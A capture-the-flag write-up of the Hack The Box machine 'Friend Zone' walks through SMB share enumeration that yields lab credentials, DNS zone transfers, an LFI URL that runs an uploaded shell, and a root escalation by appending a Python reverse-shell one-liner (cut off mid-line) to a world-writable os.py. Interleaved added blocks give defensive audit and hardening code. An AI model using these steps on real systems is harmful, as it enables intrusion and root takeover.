Donald Ashdown

HTB Friend Zone


Overview


This machine forces you to think about DNS servers and name lookups critically.

It starts off with the typical unsecured SMB shares where credentials are found, but then takes a twist requiring the user to enumerate subdomains and DNS records. After uncovering the subdomains you are required to visit many sites over HTTP and HTTPS, eventually finding a login page whose dashboard has a local file inclusion (LFI) vulnerability. This means we can upload a file to the webserver and call it through the URL with a ? query, appending the path to our file. The include runs our script and gives us a backdoor.


A cron job is executing an important python script every 2 minutes, and that script imports the os module. We are able to inject code into the os module because its permissions are not configured properly. From here we execute code for a backdoor.


Summary

  • Insecure SMB shares reveal password

  • Subdomain enumeration provides a new target

  • DNS enumeration provides a new subdomain of the subdomain.

  • This domain on the dash board page has an LFI vulnerability

  • A python script executing as root imports a library (os.py) that has 777 permissions, so we can inject code into it and wait for root to execute it.

Tools/Blogs used


  • smbclient

  • dig

Lessons Learned


This machine was fairly pain free. I enjoyed the python library injection.


Enumeration


nmap 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 13:32 UTC
Nmap scan report for 10.10.10.123
Host is up (0.21s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
53/tcp   open     domain
80/tcp   open     http
139/tcp  open     netbios-ssn
443/tcp  open     https
445/tcp  open     microsoft-ds
2920/tcp filtered roboeda

Nmap done: 1 IP address (1 host up) scanned in 23.08 seconds

Enumeration detailed

A standard nmap scan, with -sC and -sV added to run the default scripts and detect service versions.



 nmap -sC -sV 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 13:26 UTC
Nmap scan report for 10.10.10.123
Host is up (0.21s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -39m40s, deviation: 1h09m16s, median: 19s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2020-11-30T15:26:58+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-30T13:26:59
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.54 seconds




SMB Enumeration - Port 445 / 139


smbclient -L 10.10.10.123
Enter WORKGROUP\htb-bluedolphin's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	Files           Disk      FriendZone Samba Server Files /etc/Files
	general         Disk      FriendZone Samba Server Files
	Development     Disk      FriendZone Samba Server Files
	IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

Well, I tried smbmap to quickly check the permissions but it has not been working, so I will have to dive in and check each file share individually. But before we do this I performed a little research to help automate my ongoing process and found the Nmap Scripting Engine has an SMB enumeration NSE script that can be successfully called.


nmap --script smb-enum-shares.nse 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 13:44 UTC
Nmap scan report for 10.10.10.123
Host is up (0.21s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 70.00 seconds

We can see that the Development and general shares are open for business (anonymous READ/WRITE). The Development share had nothing of use, but the general share had plain text credentials.
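As an added example (not part of the original write-up), here is a small Python audit that parses smb-enum-shares output like the block above and flags every non-IPC share that an anonymous (guest) session can reach. The sample text is constructed from three of the shares shown on this page; the parser and the share-name/attribute regexes are my own.

```python
import re

# Constructed sample: an excerpt in the format printed by nmap's
# smb-enum-shares script (three of the shares seen on the target).
SAMPLE_NMAP_OUTPUT = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.123\Development:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files:
|     Type: STYPE_DISKTREE
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
"""

# A share header looks like "\\host\name:"; attributes look like "Key: value".
SHARE_RE = re.compile(r"^\\\\([^\\]+)\\([^:]+):\s*$")
ATTR_RE = re.compile(r"^([A-Za-z][A-Za-z ]*):\s*(.*)$")


def parse_smb_enum_shares(text):
    """Parse smb-enum-shares output into {share_name: {attribute: value}}."""
    shares = {}
    current = None
    for raw in text.splitlines():
        # Drop nmap's "|", "|_" and indentation prefix.
        line = raw.lstrip("|_ ").rstrip()
        m = SHARE_RE.match(line)
        if m:
            current = m.group(2)
            shares[current] = {"host": m.group(1)}
            continue
        m = ATTR_RE.match(line)
        if m and current is not None:
            shares[current][m.group(1)] = m.group(2)
    return shares


def risky_shares(shares):
    """Non-IPC shares that anonymous sessions can read or write.

    IPC$ is skipped: anonymous access to the IPC pipe is normal on Samba and
    is not a file exposure by itself. Returns [(share_name, access), ...].
    """
    findings = []
    for name, attrs in shares.items():
        if attrs.get("Type") == "STYPE_IPC_HIDDEN":
            continue
        access = attrs.get("Anonymous access", "<none>")
        if access != "<none>":
            findings.append((name, access))
    return findings


if __name__ == "__main__":
    for name, access in risky_shares(parse_smb_enum_shares(SAMPLE_NMAP_OUTPUT)):
        print(f"[!] share {name} allows anonymous {access}")
```

On the target this reports only Development: the writable guest share is the one that later becomes the drop point for the LFI. The Samba-side fix is `guest ok = no` on the share and `map to guest = Never` globally, so unauthenticated sessions are refused rather than mapped to the guest account.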


General Share


smbclient //10.10.10.123/general
Enter WORKGROUP\htb-bluedolphin's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 16 20:10:51 2019
  ..                                  D        0  Wed Jan 23 21:51:02 2019
  creds.txt                           N       57  Tue Oct  9 23:52:42 2018

		9221460 blocks of size 1024. 6460344 blocks available
smb: \> get creds.txt 
getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> 

cat creds.txt 
creds for the admin THING:

admin:WORKWORKHhallelujah@#



HTTP Enumeration - Port 80



This smells like subdomain enumeration.

Browsing to friendzoneportal.red redirects us to /?z. Firing up Burp Suite to intercept the request just redirects us to the main page again.


Testing the HTTPS page provides us with a different landing page.



A DNS zone transfer (dig axfr) against the target's name server showed us a couple of subdomains.



dig axfr friendzoneportal.red @10.10.10.123

; <<>> DiG 9.16.2-Debian <<>> axfr friendzoneportal.red @10.10.10.123
;; global options: +cmd
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.	604800	IN	AAAA	::1
friendzoneportal.red.	604800	IN	NS	localhost.
friendzoneportal.red.	604800	IN	A	127.0.0.1
admin.friendzoneportal.red. 604800 IN	A	127.0.0.1
files.friendzoneportal.red. 604800 IN	A	127.0.0.1
imports.friendzoneportal.red. 604800 IN	A	127.0.0.1
vpn.friendzoneportal.red. 604800 IN	A	127.0.0.1
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 212 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Mon Nov 30 15:42:41 UTC 2020
;; XFR size: 9 records (messages 1, bytes 309)


The above subdomains are to be added to /etc/hosts and mapped to the server's IP address. This lets our machine resolve each name to the target, so the request for each virtual host reaches the web server.



Logging in with the credentials we found in the SMB general share, we are brought to a page that simply suggests we look elsewhere.



Back to the drawing board


It was here that taking a step back was much needed. Another attempt at subdomain enumeration turned up friendzone.red, and a DNS zone transfer against it provided some juicy information.


dig axfr friendzone.red @10.10.10.123

; <<>> DiG 9.16.2-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.		604800	IN	AAAA	::1
friendzone.red.		604800	IN	NS	localhost.
friendzone.red.		604800	IN	A	127.0.0.1
administrator1.friendzone.red. 604800 IN A	127.0.0.1
hr.friendzone.red.	604800	IN	A	127.0.0.1
uploads.friendzone.red.	604800	IN	A	127.0.0.1
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 212 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Sat Dec 05 18:29:32 UTC 2020
;; XFR size: 8 records (messages 1, bytes 289)


Adding administrator1.friendzone.red to /etc/hosts gave us access to the admin login page, but only over HTTPS. Initially HTTP was serving a broken page, which was a bit of a red herring.
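Both zone transfers above (friendzoneportal.red and friendzone.red) succeed because the name server answers AXFR for anyone. As an added example, not from the original write-up, the following Python parses dig axfr output into records, confirms the transfer was complete, and lists the hostnames the zone leaked, which is the check a defender would script to verify a BIND `allow-transfer` restriction actually took effect. The sample text is constructed from the friendzoneportal.red transfer shown on this page.

```python
# Constructed sample: the dig axfr output shown above, as dig prints it
# (comment lines begin with ';', record fields are tab/space separated).
SAMPLE_AXFR = """\
; <<>> DiG 9.16.2-Debian <<>> axfr friendzoneportal.red @10.10.10.123
;; global options: +cmd
friendzoneportal.red.\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.\t604800\tIN\tAAAA\t::1
friendzoneportal.red.\t604800\tIN\tNS\tlocalhost.
friendzoneportal.red.\t604800\tIN\tA\t127.0.0.1
admin.friendzoneportal.red. 604800 IN\tA\t127.0.0.1
files.friendzoneportal.red. 604800 IN\tA\t127.0.0.1
imports.friendzoneportal.red. 604800 IN\tA\t127.0.0.1
vpn.friendzoneportal.red. 604800 IN\tA\t127.0.0.1
friendzoneportal.red.\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 212 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; XFR size: 9 records (messages 1, bytes 309)
"""


def parse_axfr(text):
    """Return (name, ttl, rtype, rdata) for every record line in dig axfr output.

    Names are lower-cased with the trailing dot removed. Comment lines and
    anything that is not a '<name> <ttl> IN <type> <rdata>' line are skipped,
    so a refused transfer (which prints only comments) yields an empty list.
    """
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split(None, 4)
        if len(parts) < 5 or parts[2] != "IN":
            continue
        name, ttl, _, rtype, rdata = parts
        records.append((name.rstrip(".").lower(), int(ttl), rtype, rdata))
    return records


def transfer_succeeded(records):
    """A complete AXFR is bracketed by the zone's SOA record at both ends."""
    return len(records) >= 2 and records[0][2] == "SOA" and records[-1][2] == "SOA"


def hostnames_below(records, zone):
    """Sorted list of names under the zone apex that the transfer disclosed."""
    zone = zone.rstrip(".").lower()
    return sorted({r[0] for r in records if r[0].endswith("." + zone)})


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    if transfer_succeeded(recs):
        print("[!] zone transfer allowed; disclosed names:")
        for host in hostnames_below(recs, "friendzoneportal.red"):
            print("   ", host)
    else:
        print("[+] zone transfer refused or incomplete")
```

Run against the second transfer on this page it would list administrator1, hr and uploads under friendzone.red in the same way. On the server side, BIND's `allow-transfer { none; };` (or a list limited to the secondaries' addresses) in the zone or options block is what turns the first branch into the second.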


This successfully brought us to the admin login page, where the credentials from the insecure SMB share provided access.







The login page redirects us to dashboard.php.


This took some time to figure out, but if we query the host with the suggested image parameter we get what we want, just like the webpage suggested: "please enter to show the image".



So we uploaded a shell through SMB to the Development share.

From there we triggered our reverse shell by appending an LFI path (../../../etc/Development) to the URL. We called the shell with the previously defined syntax and received a backdoor.


https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell


We get the flag from here, easy peasy :)
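The root cause is that dashboard.php builds an include path from the pagename parameter without constraining it. As an added example (not the target's code, which the write-up never shows), the Python below models the flawed pattern next to a hardened version. It assumes the page appends ".php" to the parameter before including it, which is why the URL above names the uploaded file without an extension; the web root and the page allowlist are constructed values.

```python
import os

# Constructed values: not the target's real web root or page names.
WEB_ROOT = "/var/www/admin"
ALLOWED_PAGES = {"dashboard", "timestamp"}


def vulnerable_resolve(pagename, web_root=WEB_ROOT):
    """The flawed pattern behind ?pagename=...: user input goes straight into
    the include path. os.path.join drops web_root entirely when pagename is
    absolute, and '..' segments walk out of it, so any readable file on disk
    whose name ends in .php can be pulled in and executed (assumption: the
    server appends '.php')."""
    return os.path.normpath(os.path.join(web_root, pagename + ".php"))


def safe_resolve(pagename, web_root=WEB_ROOT):
    """Hardened: accept only known page names, then confirm the resolved path
    still sits under the web root (realpath follows symlinks so a planted
    link cannot bypass the check). Returns None when the request is rejected."""
    if pagename not in ALLOWED_PAGES:
        return None
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, pagename + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for p in ("dashboard", "/etc/Development/shell", "../../../etc/Development/shell"):
        print(f"{p!r:40} vulnerable -> {vulnerable_resolve(p)}")
        print(f"{'':40} hardened   -> {safe_resolve(p)}")
```

The allowlist alone defeats both the absolute path and the traversal form; the commonpath check is kept as a second layer for code paths that cannot use a fixed allowlist. Either way, a file dropped on a writable SMB share is only dangerous because the include would follow an attacker-chosen path to it.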


Privilege Escalation


After some initial enumeration I did not find much. Eventually I ran pspy and noticed a script being called every few minutes.



Investigating this script showed the following file contents.



#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

It was suggested that at this point we have to spend time enumerating and researching the script. Eventually I researched the python module 'os' and came across research regarding its exploitation.


I found some information, but nothing overly helpful; I did learn that the os.py file has open permissions.



friend@FriendZone:/opt/server_admin$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15  2019 /usr/lib/python2.7/os.py
friend@FriendZone:/opt/server_admin$ 

So this means we can inject code into the library: when the cron script runs as root, its "import os" line loads os.py, and Python executes whatever we appended to it.
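The ls -la output above is the whole vulnerability: a stdlib module that root imports is writable by everyone. As an added example (my own code, not part of the original write-up), here is a small audit that walks the interpreter's module search path and reports any module file with the other-write bit set, plus any directory that is world-writable without the sticky bit (where anyone could drop a new module). It also builds a throwaway tree with a 777 os.py to show what the finding looks like; the file names in that tree are constructed.

```python
import os
import stat
import sys
import tempfile

MODULE_SUFFIXES = (".py", ".pth", ".so")


def _mode(path):
    try:
        return os.lstat(path).st_mode
    except OSError:
        return None


def _dir_is_open(mode):
    # World-writable directory without the sticky bit: any user can create or
    # replace entries in it, e.g. plant a module that shadows a real one.
    return stat.S_ISDIR(mode) and bool(mode & stat.S_IWOTH) and not (mode & stat.S_ISVTX)


def _file_is_open(mode):
    # World-writable regular file: any user can append code that runs on import.
    return stat.S_ISREG(mode) and bool(mode & stat.S_IWOTH)


def world_writable_modules(search_dirs):
    """Return sorted paths under search_dirs that an unprivileged user could
    modify and that a privileged Python process would later import."""
    findings = set()
    for base in search_dirs:
        if not base or not os.path.isdir(base):
            continue
        mode = _mode(base)
        if mode is not None and _dir_is_open(mode):
            findings.add(base)
        for root, dirs, files in os.walk(base):
            for name in dirs:
                path = os.path.join(root, name)
                mode = _mode(path)
                if mode is not None and _dir_is_open(mode):
                    findings.add(path)
            for name in files:
                if not name.endswith(MODULE_SUFFIXES):
                    continue
                path = os.path.join(root, name)
                mode = _mode(path)
                if mode is not None and _file_is_open(mode):
                    findings.add(path)
    return sorted(findings)


def demo_scan():
    """Build a temp tree mirroring the finding above (a 777 os.py next to a
    properly 644 module) and scan it. Returns (findings, path_of_bad_file)."""
    base = tempfile.mkdtemp(prefix="pylib-audit-")   # created with mode 0700
    good = os.path.join(base, "good.py")
    bad = os.path.join(base, "os.py")                  # constructed name
    for p in (good, bad):
        with open(p, "w") as fh:
            fh.write("# placeholder module\n")
    os.chmod(good, 0o644)
    os.chmod(bad, 0o777)   # same mode the target's /usr/lib/python2.7/os.py had
    return world_writable_modules([base]), bad


if __name__ == "__main__":
    # Audit this interpreter's own search path (the check that would have
    # caught the target's os.py before a root cron job imported it).
    hits = world_writable_modules(sys.path)
    for path in hits:
        print(f"[!] world-writable: {path}")
    if not hits:
        print("[+] no world-writable modules or module directories on sys.path")
```

For a cron job the relevant interpreter is the one named in the script's shebang, so run the audit with that interpreter rather than whichever python is first on your PATH. The fix on the target is a plain `chmod 644` of the module and ownership by root, and a periodic run of a check like this (or a file-integrity tool over the stdlib directory) is the detection.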


Initially I tried to inject code to cat the root flag into the temp folder and had no luck. I was not familiar enough with the syntax to troubleshoot the issue in a timely manner, so I decided to move into an area I was more syntactically familiar with.


I proceeded to attempt reverse shell injections and had some issues, but eventually settled on the python reverse shell with IPv4 syntax. I had to actually remove the python -c and the double quotes to get this to work. You can see the screenshot below:


This was pasted at the end of the os module.


import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s$




